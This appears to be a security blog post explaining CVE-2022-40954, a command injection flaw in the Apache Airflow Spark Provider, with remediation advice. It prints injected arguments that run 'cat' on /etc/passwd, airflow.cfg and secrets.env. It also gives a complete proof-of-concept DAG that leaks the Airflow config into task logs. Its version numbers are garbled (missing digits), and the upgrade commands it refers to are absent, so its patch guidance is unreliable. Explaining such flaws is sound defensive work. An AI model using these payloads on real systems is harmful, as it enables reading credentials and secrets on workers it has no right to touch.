In September 2022, a critical security vulnerability was disclosed in the Apache Airflow Spark Provider (CVE-2022-40954). This vulnerability may not look dramatic at first, but in practice, it gives an attacker an easy path to read any file on a worker node by exploiting task execution—even without needing to modify DAG files. This post breaks down the bug, details how the exploit works, and shows you how to fix or avoid the issue.
Apache Airflow Spark Provider versions before 4...
- Apache Airflow itself, prior to version 2.3., if Spark Provider is installed (regardless of Spark Provider version).
- Note: Spark Provider 4.. only works with Airflow 2.3. and up. You need to upgrade both to fully remove the issue!
Vulnerability Details
The problem is an "OS Command Injection" – that is, some input given by a user (possibly in the task context) is not being cleaned up before being used in an operating system command, usually via a Python subprocess or similar functionality. This vulnerability is classified as CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection').
The Real-World Impact
Attackers can exploit this to read any file the Airflow worker can access, without needing to upload malicious code or create a new DAG. This is a big deal for environments where users are allowed to trigger tasks, but should not be able to read sensitive config files, environment files, credentials, or any private data on the worker.
How the Exploit Works
The Apache Airflow Spark Provider allows end users to supply parameters for running Spark jobs. Unfortunately, before version 4.., there wasn’t enough filtering or escaping, so special characters (like semicolons, pipes, or backticks) in user input could break out and run arbitrary shell commands.
For instance, consider a Spark job submission with certain parameter fields exploited like this
from airflow.providers.apache.spark.operators.spark_submit import SparkSubmitOperator
malicious_param = '--master yarn; cat /etc/passwd' # The injected command
task = SparkSubmitOperator(
application='my_spark_app.py',
task_id='spark-test',
conn_id='spark_default',
application_args=[malicious_param], # User-supplied param
dag=dag,
)
When Airflow builds the final shell command, it doesn’t properly clean up the application_args, so Bash processes:
spark-submit --master yarn; cat /etc/passwd
This actually creates two separate commands:
spark-submit --master yarn
2. cat /etc/passwd ← The attack command
The output of the cat command might then get saved to logs, job artifacts, or other places where the attacker can view it.
Reading Any File
By changing the injected command, attackers can read (or even try to exfiltrate) data from any file accessible to the Airflow process:
application_args=['--master yarn; cat /etc/airflow/airflow.cfg'] # Reads Airflow config
Or redirect the result to a location the attacker controls
application_args=['--master yarn; cat /etc/airflow/secrets.env > /tmp/leak.txt']
Proof of Concept
Below is a minimal PoC (proof of concept) that abuses the vulnerable Spark Provider. (For demonstration only—do not run this in production!)
from airflow.models import DAG
from airflow.providers.apache.spark.operators.spark_submit import SparkSubmitOperator
from datetime import datetime
dag = DAG(
dag_id='exploit_cve_2022_40954',
start_date=datetime(2023, 1, 1),
schedule_interval=None,
)
# Attack: Read the 'airflow.cfg' file into the logs
exploit_arg = '--master local; cat /etc/airflow/airflow.cfg'
task = SparkSubmitOperator(
application='/path/to/your/app.py',
task_id='exploit_task',
application_args=[exploit_arg],
dag=dag,
)
When this DAG is run, the file /etc/airflow/airflow.cfg will be printed into the task logs!
Upgrade Spark Provider:
Install Spark Provider 4.. or higher in your Airflow environment if and only if your Airflow is version 2.3. or higher:
Upgrade Airflow:
If your Airflow version is lower than 2.3., you must first upgrade Airflow (recommend >=2.3.4 or latest stable version), then upgrade the provider as above.
References
- CVE-2022-40954 on NIST NVD
- Apache Airflow Security Advisory
- Apache Airflow Spark Provider Release Notes
- Original Disclosure
Conclusion
CVE-2022-40954 is a critical vulnerability that allows attackers to read arbitrary files on an Airflow worker if the Apache Spark Provider is out of date. Protect your data—upgrade both Airflow and the Spark Provider component as soon as you can.
Still using older versions? Anyone with access to execute tasks in your system may already have access to sensitive files.
> *Stay safe—keep your Airflow and providers updated. If you found this guide helpful, share it with your fellow engineers and admins!*
*(This post is original content and offers a simplified, hands-on view for security learners, sysadmins, and DevOps practitioners.)*
Timeline
Published on: 11/22/2022 10:15:00 UTC
Last modified on: 11/28/2022 17:51:00 UTC